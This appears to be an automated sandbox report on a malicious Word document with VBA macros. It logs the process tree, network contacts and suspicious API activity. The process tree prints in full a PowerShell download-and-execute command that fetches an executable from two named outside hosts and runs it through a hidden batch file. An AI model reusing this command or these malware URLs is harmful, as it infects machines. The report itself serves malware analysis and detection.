Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	June 25, 2021, 8:44 a.m.	June 25, 2021, 8:48 a.m.

Size	55.5KB
Type	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: 12345, Template: Normal.dotm, Last Saved By: 12345, Revision Number: 146, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:16:00, Create Time/Date: Wed Sep 5 08:52:00 2018, Last Saved Time/Date: Wed Sep 5 10:14:00 2018, Number of Pages: 1, Number of Words: 116, Number of Characters: 663, Security: 0
MD5	`54b6d7cd8137b1d76ee21be9cf81a480`
SHA256	`fa42efcc6fdaafe251de452d806503b6c21fa6e8f5696f9ea23afe9bfb215623`
CRC32	`AA2BDC3C`
ssdeep	`768:wuYQxDUL7efMSbVrrboYzcHR9GsmWQeLie7wv:3xDqqfPbFC0AJC`
Yara	Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries] Microsoft_Office_File_Zero - Microsoft Office File

WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\AuthenticationCode-3139821.doc
7132
- cmd.exe cmd /c powershell "'powershell ""function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,''%tmp%\klerscor.exe'');start-process ''%tmp%\klerscor.exe'';}try{chaitra2(''http://kalameafoods.gr/supetre.orau'')}catch{chaitra2(''http://starvdata.com/supetre.orau'')}'"" | out-file -encoding ascii -filepath %tmp%\owernice38.bat; start-process '%tmp%\owernice38.bat' -windowstyle hidden"
  3236
  - powershell.exe powershell "'powershell ""function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,''C:\Users\test22\AppData\Local\Temp\klerscor.exe'');start-process ''C:\Users\test22\AppData\Local\Temp\klerscor.exe'';}try{chaitra2(''http://kalameafoods.gr/supetre.orau'')}catch{chaitra2(''http://starvdata.com/supetre.orau'')}'"" | out-file -encoding ascii -filepath C:\Users\test22\AppData\Local\Temp\owernice38.bat; start-process 'C:\Users\test22\AppData\Local\Temp\owernice38.bat' -windowstyle hidden"
    4372
    - cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\owernice38.bat" "
      8752
      - powershell.exe powershell "function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,'C:\Users\test22\AppData\Local\Temp\klerscor.exe');start-process 'C:\Users\test22\AppData\Local\Temp\klerscor.exe';}try{chaitra2('http://kalameafoods.gr/supetre.orau')}catch{chaitra2('http://starvdata.com/supetre.orau')}
        2228

Name	Response	Post-Analysis Lookup
www.starvdata.com	CNAME starvdata.com A 108.179.246.83	108.179.246.83
starvdata.com	A 108.179.246.83	108.179.246.83
kalameafoods.gr	A 185.25.20.5	185.25.20.5

IP Address	Status	Action
13.82.24.228	Active	Moloch
108.179.246.83	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
185.25.20.5	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 25, 2021, 8:44 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 25, 2021, 8:44 a.m.			0	0
IsDebuggerPresent June 25, 2021, 8:44 a.m.			0	0

Command line console output was observed (13 events)

Time & API	Arguments	Status	Return
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: powershell console_handle: 0x00000007	1	1
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: "function chaitra2([string] $vonaherT){(new-object system.net.webclient).downloadfile($vonaherT,'C:\Users\test22\AppData\Local\Temp\klerscor.exe');start-process 'C:\Users\test22\AppData\Local\Temp\klerscor.exe';}try{chaitra2('http://kalameafoods.gr/supetre.orau')}catch{chaitra2('http://starvdata.com/supetre.orau')} console_handle: 0x00000007	1	1
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: Exception calling "DownloadFile" with "2" argument(s): "The remote server retur console_handle: 0x00000023	1	1
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: ned an error: (404) Not Found." console_handle: 0x0000002f	1	1
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: At line:1 char:85 console_handle: 0x0000003b	1	1
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: + function chaitra2([string] $vonaherT){(new-object system.net.webclient).downl console_handle: 0x00000047	1	1
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: oadfile <<<< ($vonaherT,'C:\Users\test22\AppData\Local\Temp\klerscor.exe');star console_handle: 0x00000053	1	1
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: t-process 'C:\Users\test22\AppData\Local\Temp\klerscor.exe';}try{chaitra2('http console_handle: 0x0000005f	1	1
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: ://kalameafoods.gr/supetre.orau')}catch{chaitra2('http://starvdata.com/supetre. console_handle: 0x0000006b	1	1
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: orau')} console_handle: 0x00000077	1	1
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x00000083	1	1
WriteConsoleW June 25, 2021, 8:44 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x0000008f	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 93 events)

Time & API	Arguments	Status	Return
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1808 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1f88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1f88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1f88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1f88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1f88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1f88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f17c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f17c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f17c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f13c8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f1d88 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f2108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f2108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f2108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f2108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f2108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f2108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f2108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f2108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f2108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f2108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f2108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f2108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f2108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f2108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f2048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f2048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f2048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f2048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f2048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f2048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003f2048 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a2180 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a2880 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a2880 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a2880 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 25, 2021, 8:44 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a1f40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 25, 2021, 8:44 a.m.		1	1	0

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	GET method with no useragent header	suspicious_request	GET http://kalameafoods.gr/supetre.orau
suspicious_features	GET method with no useragent header	suspicious_request	GET http://starvdata.com/supetre.orau
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.starvdata.com/supetre.orau

Performs some HTTP requests (3 events)

request	GET http://kalameafoods.gr/supetre.orau
request	GET http://starvdata.com/supetre.orau
request	GET http://www.starvdata.com/supetre.orau

Allocates read-write-execute memory (usually to unpack itself) (50 out of 294 events)

Time & API	Arguments	Status
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05171000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x743c1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06220000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06220000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06230000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7132 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06240000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ea71000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6eac5000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x673a1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x66c91000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x62d31000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x62d34000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x507c1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x5e721000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 7132 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x5fe05000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 1900544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02960000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02af0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x62ae1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0220a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x62ae2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02202000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02212000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02af1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02af2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02213000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02214000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0268b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02687000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0220b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02672000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02685000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02215000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02800000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02216000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0268c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02673000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02674000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02675000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02676000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02677000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02678000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 25, 2021, 8:44 a.m.	process_identifier: 4372 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02679000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
